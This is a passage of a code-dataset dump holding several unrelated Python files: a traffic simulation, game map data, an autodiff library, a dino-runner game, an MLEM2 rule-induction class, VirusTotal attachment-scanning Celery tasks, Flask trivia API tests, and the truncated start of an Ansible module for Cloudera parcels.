[np.trapz(auto3[0:i+2],tijd[0:i+2]) + p3 for i in range(len(tijd)-1)]\n\n\nb1 =121\nb2 =121\nb3 =121\nv = 0\nfor x in range(len(tijd)-1):\n if (positie2[v]+1) >= (positie1[v]-1) and b1 > tijd[v]:\n b1 = tijd[v]\n print(\"Er is een bosting plaatsgevonde tussen auto 1 en auto 2 om {}\\n\".format(b1))\n if (positie3[v]+1) >= (positie1[v]-1) and b2 > tijd[v]:\n b2 = tijd[v]\n print(\"Er is een bosting plaatsgevonde tussen auto 1 en auto 3 om {}\\n\".format(b2))\n if (positie2[v]+1) >= (positie3[v]-1) and b3 > tijd[v]:\n b3 = tijd[v]\n print(\"Er is een bosting plaatsgevonde tussen auto 1 en auto 2 om {}\\n\".format(b3))\n v+=1\n\nplt.plot(positie1,'r')\nplt.plot(positie2,'g')\nplt.plot(positie3,'b')\nplt.axis([0, 1200, -10,950])\nplt.show()\n\n","sub_path":"VerkeersimulatieRechteWeg/Verkeerd__Snelheid-VerkeersimulatieRechteWeg.py","file_name":"Verkeerd__Snelheid-VerkeersimulatieRechteWeg.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135099974","text":"from mUnit import UNIT_NONE, UNIT_SOLDIER, UNIT_BASE, UNIT_WORKER, UNITS, UNIT_RES\nimport mMap\n\nmap1 = {'length': 20,\n\t\t'heigth': 20,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(1, 2): UNIT_SOLDIER,\n\t\t\t(1, 3): UNIT_SOLDIER,\n\t\t\t(3, 2): UNIT_BASE,\n\t\t\t(5, 4): UNIT_RES,\n\t\t\t(6, 5): UNIT_WORKER,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(15, 16): UNIT_BASE,\n\t\t\t(18, 16): UNIT_RES,\n\t\t\t(18, 17): UNIT_WORKER,\n\t\t},\n\t}\n\nmap2 = {'length': 12,\n\t\t'heigth': 12,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(2, 1): UNIT_WORKER,\n\t\t\t(3, 1): UNIT_BASE,\n\t\t\t(1, 1): UNIT_RES,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(8, 10): UNIT_BASE,\n\t\t\t(10, 10): UNIT_RES,\n\t\t\t(9, 10): UNIT_WORKER,\n\t\t},\n\t}\n\t\nmap3 = {'length': 6,\n\t\t'heigth': 6,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(1, 1): UNIT_BASE,\n\t\t\t(0, 0): UNIT_RES,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(4, 4): UNIT_BASE,\n\t\t\t(5, 5): UNIT_RES,\n\t\t\t#(5, 1): UNIT_WORKER,\n\t\t},\n\t}\n\nmap4 = {'length': 8,\n\t\t'heigth': 8,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(1, 1): UNIT_BASE,\n\t\t\t(0, 0): UNIT_RES,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(6, 6): UNIT_BASE,\n\t\t\t(7, 7): UNIT_RES,\n\t\t\t#(5, 1): UNIT_WORKER,\n\t\t},\n\t}\n\ndef init_map(map_data):\n\t_map = mMap.mMap(map_data)\n\tif map_data == map1:\n\t\t_unit2 = _map[15][16]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[18][16]\n\t\t_unit4.camp_ = 1\n\t\t_unit4 = _map[18][17]\n\t\t_unit4.camp_ = 1\n\telif map_data == map2:\n\t\t_unit2 = _map[8][10]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[9][10]\n\t\t_unit4.camp_ = 1\n\t\t_unit3 = _map[10][10]\n\t\t_unit3.camp_ = 1\n\telif map_data == map3:\n\t\t_unit2 = _map[4][4]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[5][5]\n\t\t_unit4.camp_ = 1\n\telif map_data == map4:\n\t\t_unit2 = _map[6][6]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[7][7]\n\t\t_unit4.camp_ = 1\n\treturn _map\n\nmaps = {\n\t'map1': init_map(map1),\n\t'map2': init_map(map2),\n\t'map3': init_map(map3),\n\t'map4': init_map(map4),\n}\n","sub_path":"rts/mData.py","file_name":"mData.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545059438","text":"from .ad import *\nfrom .ad import ADF, _get_variables, to_auto_diff, _apply_chain_rule, _is_constant, constant, null, get_order, set_order\nfrom .ad import admath\n\nimport numpy as np\nfrom numbers import Number\nimport scipy, scipy.signal, scipy.sparse\nfrom scipy.sparse.linalg import expm_multiply\n\ndef _make_derivs_dicts():\n if get_order() == 1:\n # no cross terms\n return {}, {}, None\n elif get_order() == 2:\n # dictionaries for first order, second order, cross terms\n return {}, {}, {}\n\ndef array(x):\n if isinstance(x, ADF):\n return x\n\n if isinstance(x, Number):\n return constant(x)\n\n if not isinstance(x, np.ndarray):\n x = np.asarray(x)\n\n if np.issubdtype(x.dtype, np.number):\n return constant(x)\n\n # get the variables to differentiate against\n adentries = []\n for i,xi in np.ndenumerate(x):\n if isinstance(xi, ADF):\n adentries.append((i,xi))\n elif not isinstance(xi,Number):\n raise TypeError(str((i,xi)))\n variables = _get_variables([xi for _,xi in adentries])\n\n # initialize the dictionaries of derivatives\n d_dicts = lc,qc,cp = _make_derivs_dicts()\n d_dicts = [d for d in d_dicts if d is not None]\n\n if variables:\n # fill the dictionaries of derivatives\n for i,xi in adentries:\n for xi_d, x_d in zip((xi._lc, xi._qc, xi._cp)[:len(d_dicts)], d_dicts):\n for k in xi_d:\n if k not in x_d:\n x_d[k] = np.zeros(x.shape)\n x_d[k][i] = xi_d[k]\n\n x_old = x\n x = np.zeros(x.shape)\n for i,xi in np.ndenumerate(x_old):\n if isinstance(xi,ADF):\n x[i] = xi.x\n elif isinstance(xi, Number):\n x[i] = xi\n else:\n raise Exception\n\n return ADF(x, lc, qc, cp)\n\n\n'''add array functionality to ADF'''\n\n'''add shape and length to ADF'''\n@property\ndef ad_shape(self):\n return self.x.shape\n\ndef ad_len(self):\n return self.x.__len__()\n\nADF.shape = ad_shape\nADF.__len__ = ad_len\n\n''' apply f to x and all its derivatives '''\ndef ad_apply(self, f, *args, **kwargs):\n ret_x = f(self.x, *args, **kwargs)\n if self._lc is null:\n return constant(ret_x)\n\n d_dicts = lc, qc, cp = _make_derivs_dicts()\n d_dicts = [d for d in d_dicts if d is not None]\n for ret_d, x_d in zip(d_dicts, (self._lc, self._qc, self._cp)[:len(d_dicts)]):\n for v in x_d:\n ret_d[v] = f(x_d[v], *args, **kwargs)\n return ADF(ret_x, lc, qc, cp)\n\nADF.apply = ad_apply\n\n''' __getitem__ and __setitem__'''\ndef ad_getitem(self, *args, **kwargs):\n return self.apply(np.ndarray.__getitem__, *args, **kwargs)\n\ndef ad_setitem(self, key, value):\n if not _is_constant(key):\n ## TODO: implement non-constant case!\n raise NotImplementedError\n self.x[key] = value\n for derivatives in (self._lc, self._qc, self._cp):\n if derivatives is not None:\n for direction in derivatives:\n derivatives[direction][key] = 0.0\n\nADF.__getitem__ = ad_getitem\nADF.__setitem__ = ad_setitem\n\n\n''' sum function and method '''\ndef sum(x, *args, **kwargs):\n if isinstance(x, ADF):\n return x.apply(np.sum, *args, **kwargs)\n return np.sum(x, *args, **kwargs)\n\ndef adarray_sum(self, *args, **kwargs):\n return self.apply(np.ndarray.sum, *args, **kwargs)\n\nADF.sum = adarray_sum\n\n\n''' truncates things within numerical precision of 0, but keeps the derivatives'''\ndef truncate(x, level=1e-16):\n assert x.x > -level\n if isinstance(x.x, Number):\n x.x = max(x.x,0.0)\n else:\n x.x[x.x < 0.0] = 0.0\n\n\n\n''' implements product rule for multiplication-like operations, e.g. matrix/tensor multiplication, convolution'''\ndef ad_product(prod):\n def f(a,b, *args, **kwargs):\n if not isinstance(a, ADF) and not isinstance(b, ADF):\n return prod(a,b)\n\n a,b = to_auto_diff(a), to_auto_diff(b)\n x = prod(a.x,b.x, *args, **kwargs)\n\n variables = _get_variables([a,b])\n if not variables:\n return constant(x)\n\n lc, qc, cp = _make_derivs_dicts()\n for i,v in enumerate(variables):\n lc[v] = prod(a.d(v), b.x, *args, **kwargs) + prod(a.x, b.d(v),*args,**kwargs)\n qc[v] = prod(a.d2(v), b.x, *args, **kwargs ) + 2 * prod(a.d(v), b.d(v), *args, **kwargs) + prod(a.x, b.d2(v), *args, **kwargs)\n if get_order() == 2:\n for j,u in enumerate(variables):\n if i < j:\n cp[(v,u)] = prod(a.d2c(u,v), b.x, *args, **kwargs) + prod(a.d(u), b.d(v), *args, **kwargs) + prod(a.d(v) , b.d(u), *args, **kwargs) + prod(a.x, b.d2c(u,v), *args, **kwargs)\n return ADF(x, lc, qc, cp)\n return f\n\n'''matrix multiplication, tensor multiplication, and convolution (Fourier domain multiplication)'''\ndot = ad_product(np.dot)\ntensordot = ad_product(np.tensordot)\n#fftconvolve = ad_product(scipy.signal.fftconvolve)\nfftconvolve = ad_product(np.convolve)\nouter = ad_product(np.outer)\n\n\ndef diag(x):\n try:\n return x.apply(np.diag)\n except:\n return np.diag(x)\n\n'''A is a constant sparse matrix.\nReturns a function f(t,b) = exp(t*A) \\dot b'''\ndef ad_expm_multiply(A):\n def func(t, b):\n if not isinstance(t, ADF) and not isinstance(b, ADF):\n return expm_multiply(t*A, b)\n t,b = to_auto_diff(t), to_auto_diff(b)\n \n if not isinstance(t.x, Number) and len(t) > 1:\n raise Exception(\"t must be a scalar\")\n\n At = t.x * A\n x = expm_multiply(At, b.x)\n\n variables = _get_variables([t,b])\n if not variables:\n return constant(x)\n\n Ax = A.dot(x)\n AAx = A.dot(Ax)\n lc, qc, cp = _make_derivs_dicts()\n\n b_derivs = {} # stores expm_multiply(At, b.d(v))\n for i,v in enumerate(variables):\n b_derivs[v] = expm_multiply(At, b.d(v))\n lc[v] = Ax * t.d(v) + b_derivs[v]\n\n # replace with A * exp(At) * b.dv\n b_derivs[v] = A.dot(b_derivs[v])\n qc[v] = AAx * t.d(v) * t.d(v) + Ax * t.d2(v) + 2 * t.d(v) * b_derivs[v] + expm_multiply(At, b.d2(v))\n\n if get_order() == 2:\n for i, v in enumerate(variables):\n for j,u in enumerate(variables):\n if i < j:\n cp[(v,u)] = AAx * t.d(u) * t.d(v) + Ax * t.d2c(u,v) + t.d(u) * b_derivs[v] + t.d(v) * b_derivs[u] + expm_multiply(At, b.d2c(u,v))\n return ADF(x, lc, qc, cp)\n return func\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"543460652","text":"import pygame\nimport random\nfrom nlc_dino_runner.components.obstacles.bird import Bird\nfrom nlc_dino_runner.components.obstacles.cactus import Cactus\nfrom nlc_dino_runner.components.obstacles.cactus_large import CactusLarge\nfrom nlc_dino_runner.utils.constants import SMALL_CACTUS, SHIELD_TYPE, BIRD, LARGE_CACTUS\n\n\nclass ObstaclesManager:\n\n def __init__(self):\n self.obstacles_list = []\n\n def update(self, game):\n if len(self.obstacles_list) == 0:\n if random.randint(0, 2) == 0:\n self.obstacles_list.append(Cactus(SMALL_CACTUS))\n elif random.randint(0, 2) == 1:\n self.obstacles_list.append(Bird(BIRD))\n elif random.randint(0, 2) == 2:\n self.obstacles_list.append(CactusLarge(LARGE_CACTUS))\n\n for obstacle in self.obstacles_list:\n obstacle.update(game.game_speed, self.obstacles_list)\n if game.player.hammer and game.player.hammer.rect.colliderect(obstacle.rect):\n self.obstacles_list.remove(obstacle)\n if game.player.dino_rect.colliderect(obstacle.rect):\n if game.player.shield:\n self.obstacles_list.remove(obstacle)\n else:\n if game.lives_manager.lives > 1:\n game.lives_manager.reduce_lives()\n game.player.shield = True\n game.player.type = SHIELD_TYPE\n start_time = pygame.time.get_ticks()\n game.player.shield_time_up = start_time + 2500\n else:\n pygame.time.delay(500)\n game.playing = False\n game.death_count += 1\n break\n\n def draw(self, screen):\n for obstacle in self.obstacles_list:\n obstacle.draw(screen)\n\n def reset_obstacles(self):\n self.obstacles_list = []\n","sub_path":"nlc_dino_runner/components/obstacles/obstaclesManager.py","file_name":"obstaclesManager.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545806628","text":"from source.utilities.helpers import Helpers\nfrom source.models.range_symbol import RangeSymbol\nfrom enum import Enum, auto\n\nclass ValueBlockType(Enum):\n ATTRIBUTE = auto()\n DECISION = auto()\n\nclass ValueBlock:\n\n def __init__(self, valueBlockType, item, value):\n self.type = valueBlockType\n self.item = item\n self.value = value\n self.block = None # Lazyily assigned by getBlock.\n\n def __eq__(self, other):\n if isinstance(other, ValueBlock):\n return self.item == other.item and self.value == other.value\n return False\n\n def __hash__(self):\n hash = 0\n\n if self.item is not None:\n hash += self.item.__hash__()\n\n if self.value is not None:\n hash += self.value.__hash__()\n\n return hash\n\n def copy(self):\n copy = ValueBlock(valueBlockType = self.type, item = self.item, value = None)\n\n if isinstance(self.value, RangeSymbol):\n copy.value = self.value.copy()\n else:\n copy.value = self.value\n\n if self.block is not None:\n copy.block = self.block.copy()\n \n return copy\n\n def toString(self, records):\n return '[({}, {})] = {}'.format(self.item, self.value, self.getBlock(records))\n\n def getBlock(self, records):\n\n # Check for precomupted block.\n if self.block is not None:\n return self.block\n\n # Create [t]\n block = set()\n for record in records:\n recordItemValue = record.itemValues[self.item]\n\n # Case: the value block is of type ATTRIBUTE.\n if self.type == ValueBlockType.ATTRIBUTE:\n\n # Case: attribute value is a Range Symbol and the record's attribute value is numeric.\n if Helpers.isNumber(recordItemValue) and type(self.value) is RangeSymbol:\n if self.value.containsValue(float(recordItemValue)):\n block.add(record.id)\n\n # Case: attribute value is Standard Symbol and the record's attribute value is non-numeric.\n elif not Helpers.isNumber(recordItemValue) and type(self.value) is not RangeSymbol:\n if recordItemValue == self.value:\n block.add(record.id)\n\n # Case: the value block is of type DECISION.\n elif self.type == ValueBlockType.DECISION:\n if recordItemValue == self.value:\n block.add(record.id)\n \n # Return [t]\n self.block = block\n return block\n\n","sub_path":"mlem2/source/models/value_block.py","file_name":"value_block.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28483764","text":"from __future__ import absolute_import, unicode_literals\n\nimport json\nimport requests\n\nfrom .verification import *\n\nfrom .utils import *\nfrom .models import File, Message\n\nfrom db.core import Connection\nfrom django.db.models import Q\nfrom unidecode import unidecode\nfrom django.conf import settings\nfrom celery import shared_task, Task\nfrom settings.models import Setting, Table\n\n\nclass BaseTask(Task):\n abstract = True\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n send_failure(exc, task_id, einfo, self.name)\n\n\n@shared_task(bind=True, name='Get report from VirusTotal', base=BaseTask)\ndef get_report(self, *args, **kwargs):\n setting = Setting.objects.get()\n obj_id, message_id, resource = args\n params = {'apikey': setting.api_key,\n 'resource': resource}\n r = requests.get(settings.URLS['REPORT'],\n params=params,\n headers=settings.HEADERS)\n\n if r.status_code != 200:\n try:\n raise ValueError(r.status_code)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n json_r = r.json()\n if int(json_r['response_code']) != 1:\n try:\n raise ValueError(json_r)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n c = Connection.create()\n try:\n message = Message.objects.get(pk=message_id)\n file = File.objects.get(id=obj_id)\n file.response_result = json.dumps(json_r)\n file.checked = True\n if int(json_r['positives']) >= setting.threshold:\n file.infected = True\n file.save()\n c.push_message(message, False)\n reason = 'Virustotal recognized %s as a virus' % \\\n file.file\n message.reason = reason\n send_alert(file.file,\n message.table,\n message.client,\n url=json_r['permalink'],\n reason=reason\n )\n return\n file.save()\n if not File.objects.filter(Q(message_id=message_id) & (\n Q(checked=False) | Q(infected=True))).count():\n c.push_message(message, True)\n message.pushed = True\n message.save()\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=2)\n finally:\n c.disconnect()\n\n\n@shared_task(bind=True, name='Send to virustotal', base=BaseTask)\ndef send_file(self, file, payload, client_id, message_id, *args, **kwargs):\n setting = Setting.objects.get()\n files = {\n 'file': (unidecode(file), payload)\n }\n r = requests.post(\n settings.URLS['SCAN'],\n files=files,\n params={'apikey': setting.api_key},\n )\n if r.status_code != 200:\n try:\n raise ValueError(r.status_code)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n json_r = r.json()\n if int(json_r['response_code']) != 1:\n try:\n raise ValueError(json_r)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n try:\n obj, _ = File.objects.get_or_create(\n file=file,\n client_id=client_id,\n hash=json_r['sha256']\n )\n obj.checked = False\n obj.response_post = json.dumps(json_r)\n obj.message_id = message_id\n obj.save()\n get_report.apply_async((obj.id,\n message_id,\n json_r['resource']),\n countdown=120)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=2)\n\n\n@shared_task(bind=True,\n name='Search of new docs with attachments',\n base=BaseTask)\ndef scan_db_attachments(self, *args, **kwargs):\n c = Connection.create()\n tables = Table.objects.filter(enabled=True)\n for table in tables:\n rows = c.scan_for_attachments(table)\n #rows = c.cursor.fetchall()\n for row in rows[3]:\n obj, created = Message.objects.get_or_create(client=row[0],\n datecreate=row[1],\n timecreate=row[2],\n table=table)\n if created:\n attachments = c.fetch_attachments(obj)\n Verifier().check(attachments, obj)\n c.disconnect()\n\n\n@shared_task(bind=True,\n name='Push docs with no attachments to finish status',\n base=BaseTask)\ndef push_docs_to_status(self, *args, **kwargs):\n c = Connection.create()\n tables = Table.objects.filter(enabled=True)\n for table in tables:\n c.push_to_accepted(table)\n c.disconnect()\n","sub_path":"viruscheck/virustotal/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"623066899","text":"#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\n\n\"\"\"\n.. include:: README.md\n\"\"\"\n__docformat__ = \"restructuredtext\"\n\n__all__ = [\n \"architect\",\n \"blueprint\",\n \"crowd_provider\",\n \"database\",\n \"architects\",\n \"blueprints\",\n \"providers\",\n \"databases\",\n]\n","sub_path":"mephisto/abstractions/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12290051","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_path = \"postgres://postgres:131252118@{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\"\n def test_successful_get_questions(self):\n res = self.client().get('/questions?page=1')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['categories'])\n self.assertTrue(data['total_questions'])\n\n def test_unsuccessful_questions_get_request(self):\n res = self.client().get('/questions?page=100')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Page Not Found')\n\n def test_successful_get_categories(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['categories'])\n \n def test_unsuccessful_categories_get_request(self):\n res = self.client().get('/categories/10')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Page Not Found')\n\n def test_successful_questions_delete_request(self):\n question = Question(question='Test Question', answer='Test answer', difficulty=4, category=5)\n question.insert()\n res = self.client().delete(f'/questions/{question.id}')\n data = json.loads(res.data)\n\n question = Question.query.get(question.id)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['question'])\n\n def test_unsuccessful_questions_delete_request(self):\n res = self.client().delete('/questions/50')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,422)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Unprocessable')\n\n def test_successful_create_question(self):\n question = {'question':'Test Question 2', 'answer':'Test answer 2', 'difficulty':3, 'category':2}\n res = self.client().post('/questions', json=question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n \n def test_unsuccessful_questions_post_request(self):\n question = {'question':'Test Question 2', 'answer':'Test answer 2'}\n res = self.client().post('/questions', json=question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,422)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Unprocessable')\n\n def test_successful_search_question(self):\n searchTerm = {'searchTerm':'Test Question 2'}\n res = self.client().post('/questions/search', json=searchTerm)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['questions'])\n\n def test_unsuccessful_search_question(self):\n searchTerm = {'searchTerm':'15648'}\n res = self.client().post('/questions/search', json=searchTerm)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'], 'Page Not Found')\n\n def test_successful_get_question_by_category(self):\n res = self.client().get('/categories/2/questions')\n data = json.loads(res.data)\n questions = Question.query.filter(Question.category == 2)\n transformedQuestion = [question.format() for question in questions]\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['questions'])\n\n def test_unsuccessful_get_question_by_category(self):\n res = self.client().get('/categories/500/questions')\n data = json.loads(res.data)\n questions = Question.query.filter(Question.category == 500)\n transformedQuestion = [question.format() for question in questions]\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'], 'Page Not Found')\n\n def test_successful_quiz_play(self):\n quizQuestion = {'previous_questions': [], 'quiz_category': {'type': 'Entertainment', 'id': 1}}\n\n res = self.client().post('/quizzes', json=quizQuestion)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n def test_unsuccessful_quiz_play(self):\n quizQuestion = {'quiz_category': {'type': 'Entertainment', 'id': 1000}}\n res = self.client().post('/quizzes', json=quizQuestion)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data[\"success\"], False)\n self.assertEqual(data[\"message\"], 'Page Not Found')\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"18463751","text":"#!/usr/bin/python3\n\nimport time\nfrom natsort import natsorted\nfrom cm_client.rest import ApiException\nimport cm_client\nfrom ansible.module_utils.basic import AnsibleModule\nimport re\nfrom functools import wraps\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.0\",\n \"supported_by\": \"community\",\n \"status\": [\"preview\"],\n \"version\": \"1.1.0\"\n}\n\n\ndef build_module():\n fields = {\n \"cm_login\": {\"required\": True, \"type\": \"str\", \"no_log\": True},\n \"cm_password\": {\"required\": True, \"type\": \"str\", \"no_log\": True},\n \"cm_host\": {\"required\": True, \"type\": \"str\"},\n \"cm_port\": {\"required\": False, \"type\": \"str\", \"default\": \"7180\"},\n \"cluster_name\": {\"required\": True, \"type\": \"str\"},\n \"api_version\": {\"required\": False, \"type\": \"str\", \"default\": \"18\"},\n \"product\": {\"required\": False, \"type\": \"str\"},\n \"version\": {\"required\": False, \"type\": \"str\", \"default\": \"latest\"},\n \"state\": {\n \"default\": \"infos\",\n \"choices\": ['present', 'distributed', 'activated', 'absent', 'infos'],\n \"type\": 'str'\n }\n }\n\n mutually_exclusive = []\n module = AnsibleModule(\n argument_spec=fields,\n mutually_exclusive=mutually_exclusive,\n supports_check_mode=True\n )\n\n return module\n\n\nclass Parcel:\n def __init__(self, name, version, cluster_name, api_client, module, no_wait=False, **kwargs):\n self.name = name\n self.module = module\n self.cluster_name = cluster_name\n self.api_client = api_client\n self.parcel_api_client_instance = cm_client.ParcelResourceApi(self.api_client)\n self.parcels_api_client_instance = cm_client.ParcelsResourceApi(self.api_client)\n # Getting cluster version to guess a \"latest\" parcel\n self.api_instance = cm_client.ClouderaManagerResourceApi(self.api_client)\n self.cluster_version = self._get_cluster_version()\n self.version = self._get_versions(version)\n self.no_wait = no_wait\n self.changed = False\n self._update()\n\n # Try-except decorator to log errors on the cluster management API requests.\n class Decorators(object):\n @classmethod\n def try_cm_api(cls, func, *args):\n @wraps(func)\n def wrapper(*args):\n try:\n return func(*args)\n except ApiException as e:\n args[0].module.fail_json(msg=f\"Cluster Manager error : {e}\")\n return wrapper\n\n def _update(self):\n self.stage = self._get_stage()\n self.status = self._get_status()\n\n @Decorators.try_cm_api\n def _get_status(self):\n return self.parcel_api_client_instance.read_parcel(self.cluster_name, self.name, self.version).state\n\n @Decorators.try_cm_api\n def _get_stage(self):\n return self.parcel_api_client_instance.read_parcel(self.cluster_name, self.name, self.version).stage.lower()\n\n @Decorators.try_cm_api\n def _get_cluster_version(self):\n return self.api_instance.get_version().version\n\n @Decorators.try_cm_api\n def _get_parcels_list(self):\n return self.parcels_api_client_instance.read_parcels(self.cluster_name).items\n\n def _get_versions(self, version):\n if version == \"latest\":\n versions = []\n for parcel in self._get_parcels_list():\n guess = re.compile(f'^.*cdh{self.cluster_version[0]}$') # i.e. \"^.*cdh6$\"\n if (parcel.product == self.name):\n # Kinda guessing the version of Fusion Client. I have doubts about it.\n if guess.match(parcel.version.lower()) or (\"cdh\" not in parcel.version):\n versions.append(parcel.version)\n if len(versions) > 0:\n version = natsorted(versions)[-1]\n return version\n\n def _check_transition(self):\n self._update()\n if self.no_wait:\n return True\n trans_states = [\"downloading\", \"distributing\", \"undistributing\", \"activating\"]\n while ((self.status.total_count > 0) and (self.status.total_count != self.status.count) or (self.stage in trans_states)):\n time.sleep(1)\n self._update()\n\n @Decorators.try_cm_api\n def _download(self):\n self.parcel_api_client_instance.start_download_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _distribute(self):\n self.parcel_api_client_instance.start_distribution_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _activate(self):\n self.parcel_api_client_instance.activate_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _deactivate(self):\n self.parcel_api_client_instance.deactivate_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _remove_distribution(self):\n self.parcel_api_client_instance.start_removal_of_distribution_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _remove_downloaded(self):\n self.parcel_api_client_instance.remove_download_command(self.cluster_name, self.name, self.version)\n\n def downloaded(self):\n if self.stage != \"downloaded\":\n if self.stage == \"activated\":\n self.deactivate()\n if self.stage == \"distributed\":\n self.undistribute()\n self._download()\n self._check_transition()\n self.changed = True\n\n def distributed(self):\n if self.stage != \"distributed\":\n if self.stage != \"downloaded\":\n if self.stage == \"available_remotely\":\n self.downloaded()\n elif self.stage == \"activated\":\n self.deactivate()\n self._distribute()\n self._check_transition()\n self.changed = True\n\n def activated(self):\n if self.stage != \"activated\":\n if self.stage != \"distributed\":\n self.distributed()\n self._activate()\n self._check_transition()\n self.changed = True\n\n def deactivate(self):\n self._deactivate()\n self._check_transition()\n\n def undistribute(self):\n self._remove_distribution()\n self._check_transition()\n\n def available_remotely(self):\n if self.stage != \"available_remotely\":\n if self.stage != \"downloaded\":\n if self.stage == \"activated\":\n self.deactivate()\n if self.stage == \"distributed\":\n self.undistribute()\n self._remove_downloaded()\n self._check_transition()\n self.changed = True\n\n def meta(self):\n meta = {\n \"product\": self.name,\n \"version\": self.version,\n \"stage\": self.stage\n }\n return meta\n\n def __repr__(self):\n return f'Parcel(name=\"{self.name}\", version=\"{self.version}\", cluster_name=\"{self.cluster_name}\", api_client={self.api_client},\\\n stage=\"{self.stage}\", status={self.status})'\n\n def __str__(self):\n return f\"name: {self.name}, version: {self.version}, state: {self.stage}\"\n\n\ndef main():\n module = build_module()\n choice_map = {\n 'present': 'downloaded',\n 'distributed': 'distributed',\n 'activated': 'activated',\n 'absent': 'available_remotely'\n }\n params = module.params\n\n api_url = f\"http://{params['cm_host']}:{params['cm_port']}/api/v{params['api_version']}\"\n cm_client.configuration.username = params['cm_login']\n cm_client.configuration.password = params['cm_password']\n cm_client.configuration.host = api_url\n api_client = cm_client.ApiClient()\n\n # Getting info at first. Info can be without any product and version, just about all available parcels.\n if params[\"state\"] == 